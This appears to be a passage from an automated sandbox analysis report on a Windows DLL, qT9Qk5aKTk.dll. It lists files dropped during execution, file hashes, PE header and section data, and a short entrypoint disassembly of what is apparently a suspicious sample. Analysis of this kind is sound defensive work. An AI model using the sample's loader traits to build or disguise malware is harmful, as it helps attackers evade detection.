                                                                                                                                                                                                                                  SHA-512:BD62FDD83A827E717621804CA6E39F034D5F0AB14EE8AAC3FAF207A4808A9659C0C45C0880E22CDF4E952BDEED8B6A76BC835F6E9A43058D518506E2E9F77A1B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF26292EA121106FE0.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39785
                                                                                                                                                                                                                                  Entropy (8bit):0.6019433878968067
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+Ks2/smS/pveS/pviS/pvz:kBqoxKAuqR+Ks2/smyeyiyz
                                                                                                                                                                                                                                  MD5:BC8AB82B0F9159139E7C8B54749F524A
                                                                                                                                                                                                                                  SHA1:2C8AF0D999489EEAAA58FC2B2381903A24B7233B
                                                                                                                                                                                                                                  SHA-256:EA8BC81235C78202DCC4E2B992575052B4837531E88D4472DC49F86BD8D2D54D
                                                                                                                                                                                                                                  SHA-512:126E3FB286883E375E8EC3BFD1FB73D7D9E1C58B605B0711B74DC9991323F1B1B8BC7611C8E7F6C99B86B9985EDAC095DDA3642512DEB5A6E52B7FB70B59DB9C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF2D124D2D484F93AA.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29989
                                                                                                                                                                                                                                  Entropy (8bit):0.3299472737179171
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwB9lwh9l2n/9l2/9laO:kBqoxKAuvScS+yUn+S7y
                                                                                                                                                                                                                                  MD5:B6336E6B2A6A63FC9F58BF9FE65E0297
                                                                                                                                                                                                                                  SHA1:8952B5293F5E30E3526CF2B61E9FC6AD353E3626
                                                                                                                                                                                                                                  SHA-256:D163187BF1430BDE7193224E3EE8CE55F1DFDB3706727EE149F7F7D852EB238D
                                                                                                                                                                                                                                  SHA-512:1B43EBDDB124AE2D715E7DC26DA113D0FE93B1F2159C31497EC429660DBE353D41D3055F01EA09C542BBD5BBF4CC4A2AF2E3C4481E99B24CA307A7DEF86CF554
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF2FE2530AB7240C94.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29989
                                                                                                                                                                                                                                  Entropy (8bit):0.32935642918200575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw1ab9lw1ab9l21a1/9I:kBqoxKAuvScS+17111++1L16y
                                                                                                                                                                                                                                  MD5:C54CD62F1F7D2CB20F7E840ABEBD0F44
                                                                                                                                                                                                                                  SHA1:BCC93094C77C693DC54B98F3A4E07300056AC8D9
                                                                                                                                                                                                                                  SHA-256:0C67486C86B798AE1E33A2D270EFAF2668F652E0A061802DBB775940B3CD6B1C
                                                                                                                                                                                                                                  SHA-512:6339857E6D8146B37ABEE4E7DDC360FEC0A43D4227D597B36BFB53A313DA00D983D55656D1724DFBE4B0D186338A22C1D821D7B59EC5FDC9EA22E344A3620E8B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF3661C54E7E77D8AD.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39801
                                                                                                                                                                                                                                  Entropy (8bit):0.6061195842441318
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kBqoxKAuvScS+qMjqjDj/Ij/yR/b/DWF+UgfM0wR/b/DWF+UgfM0kR/b/DWF+Ugl:kBqoxKAuvScS+qMWfMem/mfmk
                                                                                                                                                                                                                                  MD5:BBA6A3EEE22B1B609AC7652C16C171B7
                                                                                                                                                                                                                                  SHA1:B81878567D940900DF806913EA6AC25FD660EBA7
                                                                                                                                                                                                                                  SHA-256:EB585EB561796924C271F2FF79EFE4B8AFFF74EA1FEE241C1086B327C7A8A1A7
                                                                                                                                                                                                                                  SHA-512:42143E93711B887C0AF5E82F3EE216517DD5F428C689655DB6CEB80F7F037A672B76021ACF2A737CDF109E3851C0E4F8DD42A7937CE2D909A4581E3AD9EA234D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF5C808EB87D860647.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39673
                                                                                                                                                                                                                                  Entropy (8bit):0.5774462830438569
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+RxRvRdRcR/RBnC3ALnC3ADnC3AI:kBqoxKAuqR+rl3el7CwLCwDCwI
                                                                                                                                                                                                                                  MD5:E54E62E22468A1F6FDF4F428BCE2BFF2
                                                                                                                                                                                                                                  SHA1:C259FF4ACEA729EC3C169D0002E15020561DB4D2
                                                                                                                                                                                                                                  SHA-256:75CAC01E3EF8842B75C4AAE06CA15E37A0D96799F47F287D7B11B01DAAA7E989
                                                                                                                                                                                                                                  SHA-512:CE10A769CA2BBEA518E513C3DDBBB47F80DA98E3A0AE0FDD1628B847D4186FEB47200FACCC6F5EA97A93E1FC9B9C55445BFD491BDC82448D2D6BA252A2E72FB5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF84343634E9276D7C.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29745
                                                                                                                                                                                                                                  Entropy (8bit):0.30046700812985444
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laApJ/I9laAC/:kBqoxxJhHWSVSEabpKQ2y
                                                                                                                                                                                                                                  MD5:6F2A4C452006C95244D870528A23573C
                                                                                                                                                                                                                                  SHA1:8CBC4F13BA10C7B8E4440C60D007E8D64BA7F645
                                                                                                                                                                                                                                  SHA-256:43DED421AF29C3BCB2C7587650B4A3D0CCDED1D235A19A9F8E0A9BA5B097056F
                                                                                                                                                                                                                                  SHA-512:492946B8DCCD5E38B91A3FF820B3D6651B633B90B4CA289B4F36E86B0022B07D19C0B1546946521E40176080E1D96936460CE028855AEC0B29197EBE2329424A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF8A471FFBEDEC3971.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18997
                                                                                                                                                                                                                                  Entropy (8bit):2.518949793837217
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoI1jqQ8h808K8d8wL3/4iM3kh7Q3f6usfm:kBqoI1jN8h808K8d81H
                                                                                                                                                                                                                                  MD5:8E318F2F38244D5452A93A638A119AEA
                                                                                                                                                                                                                                  SHA1:D97A0A79DEF6440047E4C4590CCECE69511EB7D3
                                                                                                                                                                                                                                  SHA-256:7C72537A6A63CA435656F7BCE496504AA70ACC6FA937BBCD3D088185E8A81854
                                                                                                                                                                                                                                  SHA-512:7A748F1AD2F3F463A671750AB7B6D314DCDCB464987D05100D3DA175A387B21315169AFE1D579727D426716C232BAF479E30BDBFC8E5F68B059BBBD303C325BB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF8EB834D22FF64704.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196750
                                                                                                                                                                                                                                  Entropy (8bit):3.1383156107022354
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:MZ/2Bfcdmu5kgTzGtYZ/2Bfc+mu5kgTzGt:l/
                                                                                                                                                                                                                                  MD5:31681437437D80CD11C8E9B060EFC962
                                                                                                                                                                                                                                  SHA1:75F6E496E538AE38AE4A70186D1B44BF92197F98
                                                                                                                                                                                                                                  SHA-256:5026FBFCDCAEE6AF1F8B8D7F2BD1696F5A0B78463B435E35D33B43A28652C104
                                                                                                                                                                                                                                  SHA-512:08D65B06F6C37F59B5103BFBC6395A0DD3FF6B9624ED82A10B8804E629E080E96474327E06DB205FE6778738DCE91BBA1ED613E721FA701489E7F0F144A557D1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFA2F8C93FE1931D2B.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39769
                                                                                                                                                                                                                                  Entropy (8bit):0.5950680179836583
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kBqoxKAuvScS+2OJqD/I/itie5n3XsGAtie5n3XsGktie5n3XsG9:kBqoxKAuvScS+2OJqDw6bHszbHsrbHsQ
                                                                                                                                                                                                                                  MD5:87DAE5995463933B8419C77733F28477
                                                                                                                                                                                                                                  SHA1:AC65A48FE007D5BAF4112BE5B52D8AB5DF1DE096
                                                                                                                                                                                                                                  SHA-256:21E848AF5B6D023E95E07A1F297351DF0DEDF5C26294A4CEAA6C5B0B15B87D40
                                                                                                                                                                                                                                  SHA-512:56C3F7EED093875A76B74322B5BFC182EFBD620723FBB52D0D0212CFEACB13EF3B3545ECA3B48101DA0197F4791EC945ECEF228B4FEF0C5E6FF39FBD2F19ED36
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFB33ED84EC8412F12.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29989
                                                                                                                                                                                                                                  Entropy (8bit):0.3294803498830615
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwM9lw89l2C/9l2K9la1:kBqoxKAuvScS+PxC+/ey
                                                                                                                                                                                                                                  MD5:FCAC343291F0E23260F5DA078659540A
                                                                                                                                                                                                                                  SHA1:5043B7FFF9C3FD00B20520197141712B336C2C57
                                                                                                                                                                                                                                  SHA-256:015170AD66D8282E51F1DC5620562369E2E0949877E4879B545DB59DFACC6598
                                                                                                                                                                                                                                  SHA-512:A9B79C2FC1C50886A87C36D88418678C97A1B9BCD3541E93C5C3B2CBFA0E7DEF552993BAAC1AD724E9D16B99E6DC82AD9D5D28650625A1040D51A98237866A5E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFC4EEEB78319EB01D.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39801
                                                                                                                                                                                                                                  Entropy (8bit):0.6041886449496772
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+j9PGNzfk0lLfk0lDfk0lI:kBqoxKAuqR+j9PGNzVLVDVI
                                                                                                                                                                                                                                  MD5:A235E5C0AB9701434EE49B2B83376C00
                                                                                                                                                                                                                                  SHA1:FD684978E9CED81B2B2DC60F4F07179B820DDF05
                                                                                                                                                                                                                                  SHA-256:941CFB419A7D097EF0097C27D0CEDCA17101A1587B46252A0820CA107A6A0E04
                                                                                                                                                                                                                                  SHA-512:51BCA93E4F87B0B8AD6F3BBCD0A5660FF7297F5C85C9EE5FD9B0329A0484233E1F75B077B565D9FB25CEE1F77435FDF1BF78CE73BB9797C2B982F481521F6671
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFCAB5BA8B11C90CF1.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39785
                                                                                                                                                                                                                                  Entropy (8bit):0.6002690612747263
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:kBqoxKAuqR+RP98fpi+tYq2i+tYq6i+tYqr:kBqoxKAuqR+RP98fpVth2Vth6Vthr
                                                                                                                                                                                                                                  MD5:E1DD307F685BFC8F29CBEE1F082AD911
                                                                                                                                                                                                                                  SHA1:64AAC4064353946CCAFEE67CB6C380535E227FD3
                                                                                                                                                                                                                                  SHA-256:8C69FF1E124382019AD6FA9A980CC005440945CD57C6E6125C383D55C3E57384
                                                                                                                                                                                                                                  SHA-512:AA3AD24B459868379100A8C85C9303327EADCB3D253388CBF9E017004A91052D30055BF5E02F7323B3726620EF930955246A1F47AE4917CCDCC07893CD66CA69
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms. (copy)
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                  Entropy (8bit):3.175529227779345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:q+dinP+IqC9GrIof1AsASFd+dinP+Iqh683GrIof1Acz++dinP+Iqx9GrIof1AVt:+P+s9S/1AJAP+N3S/1ApP+b9S/1Af
                                                                                                                                                                                                                                  MD5:237880D3E2A725AB718078878604A903
                                                                                                                                                                                                                                  SHA1:F3C59A147169B76319C0DF2721AE4217632BBA2D
                                                                                                                                                                                                                                  SHA-256:3F35CAE4DFE865844B0252295FBAF19E05CAE5CA462DE4640F62DAD1E921DC71
                                                                                                                                                                                                                                  SHA-512:4C9FE56815CD9594B87CBC3749EAF40357E789C0051B6117D21878C0B5E66BA0625C3629B0E98DA4D910250885CFEF60797893CA15D4BB2FD12EFC402FF77AF6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ...................................FL..................F.@.. .....@.>...p.,Io.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.y..PROGRA~1..t......L.*Si.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*Sr...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*Sq......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............N......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-mshS (copy)
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                  Entropy (8bit):3.175529227779345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:q+dinP+IqC9GrIof1AsASFd+dinP+Iqh683GrIof1Acz++dinP+Iqx9GrIof1AVt:+P+s9S/1AJAP+N3S/1ApP+b9S/1Af
                                                                                                                                                                                                                                  MD5:237880D3E2A725AB718078878604A903
                                                                                                                                                                                                                                  SHA1:F3C59A147169B76319C0DF2721AE4217632BBA2D
                                                                                                                                                                                                                                  SHA-256:3F35CAE4DFE865844B0252295FBAF19E05CAE5CA462DE4640F62DAD1E921DC71
                                                                                                                                                                                                                                  SHA-512:4C9FE56815CD9594B87CBC3749EAF40357E789C0051B6117D21878C0B5E66BA0625C3629B0E98DA4D910250885CFEF60797893CA15D4BB2FD12EFC402FF77AF6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4O87P10W4HIR4BH2GAF8.temp
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                  Entropy (8bit):3.175529227779345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:q+dinP+IqC9GrIof1AsASFd+dinP+Iqh683GrIof1Acz++dinP+Iqx9GrIof1AVt:+P+s9S/1AJAP+N3S/1ApP+b9S/1Af
                                                                                                                                                                                                                                  MD5:237880D3E2A725AB718078878604A903
                                                                                                                                                                                                                                  SHA1:F3C59A147169B76319C0DF2721AE4217632BBA2D
                                                                                                                                                                                                                                  SHA-256:3F35CAE4DFE865844B0252295FBAF19E05CAE5CA462DE4640F62DAD1E921DC71
                                                                                                                                                                                                                                  SHA-512:4C9FE56815CD9594B87CBC3749EAF40357E789C0051B6117D21878C0B5E66BA0625C3629B0E98DA4D910250885CFEF60797893CA15D4BB2FD12EFC402FF77AF6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5XFGIZ6WP2107RV40ZZA.temp
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                  Entropy (8bit):3.175529227779345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:q+dinP+IqC9GrIof1AsASFd+dinP+Iqh683GrIof1Acz++dinP+Iqx9GrIof1AVt:+P+s9S/1AJAP+N3S/1ApP+b9S/1Af
                                                                                                                                                                                                                                  MD5:237880D3E2A725AB718078878604A903
                                                                                                                                                                                                                                  SHA1:F3C59A147169B76319C0DF2721AE4217632BBA2D
                                                                                                                                                                                                                                  SHA-256:3F35CAE4DFE865844B0252295FBAF19E05CAE5CA462DE4640F62DAD1E921DC71
                                                                                                                                                                                                                                  SHA-512:4C9FE56815CD9594B87CBC3749EAF40357E789C0051B6117D21878C0B5E66BA0625C3629B0E98DA4D910250885CFEF60797893CA15D4BB2FD12EFC402FF77AF6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown

                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                                                                  Entropy (8bit):5.998813093039927
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                  File name:qT9Qk5aKTk.dll
                                                                                                                                                                                                                                  File size:243712
                                                                                                                                                                                                                                  MD5:58d9e2906f42336e9bee1137b4cf5839
                                                                                                                                                                                                                                  SHA1:7f29e42f6d317d7b11ad164a672e91e4515b5bc0
                                                                                                                                                                                                                                  SHA256:a9a0db068a2ed9c7b9b3cdbe7f3c1c82a6f9d2c1c7d4b820820927da004b6cbf
                                                                                                                                                                                                                                  SHA512:29feb57c0eaf537007a405c30975661f6e0608d46b78344f9de1c824612b8a396dad1abf00207ac7e76f83b04f4f62aae1b290ef6cc1196a83b5cea24772bec7
                                                                                                                                                                                                                                  SSDEEP:6144:tz3raG3DJCO3wVhIZhzG7WS7l8jE0DjSBj1:tDt4OtRZS7d
                                                                                                                                                                                                                                  File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.P`...........!................b........@....@........................................................................

                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                  Icon Hash:aca1b2a9bab29200

                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Entrypoint:0x40bb62
                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                                                                                  Time Stamp:0x60500767 [Tue Mar 16 01:18:31 2021 UTC]
                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                  Import Hash:f34df13d9f12a151ff03a5b61c12591c

                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                  sub esp, 24h
                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                  call dword ptr [004360A4h]
                                                                                                                                                                                                                                  mov dword ptr [ebp-14h], eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-18h], eax
                                                                                                                                                                                                                                  push 0000001Dh
                                                                                                                                                                                                                                  push 004387C8h
                                                                                                                                                                                                                                  push 0043E7F0h
                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                  call dword ptr [004360ECh]
                                                                                                                                                                                                                                  mov dword ptr [ebp-18h], eax
                                                                                                                                                                                                                                  cmp eax, 00000000h
                                                                                                                                                                                                                                  jne 00007F5B7CAB9BC6h
                                                                                                                                                                                                                                  mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                                                  push 00000015h
                                                                                                                                                                                                                                  push 0000003Dh
                                                                                                                                                                                                                                  push dword ptr [00453FF8h]
                                                                                                                                                                                                                                  call 00007F5B7CAC5011h
                                                                                                                                                                                                                                  lea esi, dword ptr [00453E24h]
                                                                                                                                                                                                                                  xor esi, 068C2815h
                                                                                                                                                                                                                                  sub esi, 55h
                                                                                                                                                                                                                                  xor esi, dword ptr [00453F34h]
                                                                                                                                                                                                                                  sub esi, esi
                                                                                                                                                                                                                                  mov dword ptr [00453E24h], esi
                                                                                                                                                                                                                                  push 0000001Dh
                                                                                                                                                                                                                                  push 004387C8h
                                                                                                                                                                                                                                  push 0043E7F0h
                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                  call dword ptr [004360ECh]
                                                                                                                                                                                                                                  mov dword ptr [00453E24h], eax
                                                                                                                                                                                                                                  cmp eax, 00000000h
                                                                                                                                                                                                                                  jne 00007F5B7CAB9C07h
                                                                                                                                                                                                                                  jmp 00007F5B7CAB9155h
                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                                  push 0000001Dh
                                                                                                                                                                                                                                  push 004387C8h
                                                                                                                                                                                                                                  push 0043E7F0h
                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                  call dword ptr [004360ECh]
                                                                                                                                                                                                                                  mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                                                                  cmp eax, 00000000h
                                                                                                                                                                                                                                  jne 00007F5B7CAB9ACEh
                                                                                                                                                                                                                                  mov dword ptr [0043C210h], eax
                                                                                                                                                                                                                                  push 0000001Dh
                                                                                                                                                                                                                                  push 004387C8h
                                                                                                                                                                                                                                  push 0043E7F0h
                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                  call dword ptr [004360ECh]
                                                                                                                                                                                                                                  cmp eax, 00000000h

                                                                                                                                                                                                                                  Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xf913 | 0x610 | .text
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3a3bc | 0x78 | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5f000 | 0xa9b4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6a000 | 0x2198 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x36000 | 0xf4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                                                                                                                                                  Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xfa15 | 0xfc00 | False | 0.502294146825 | data | 6.16505277896 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
(nameless) | 0x11000 | 0x82 | 0x200 | False | 0.263671875 | data | 1.90933265931 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(nameless) | 0x12000 | 0xbe | 0x200 | False | 0.36328125 | data | 2.50841842788 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(nameless) | 0x13000 | 0xdb | 0x200 | False | 0.392578125 | data | 2.84165337483 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
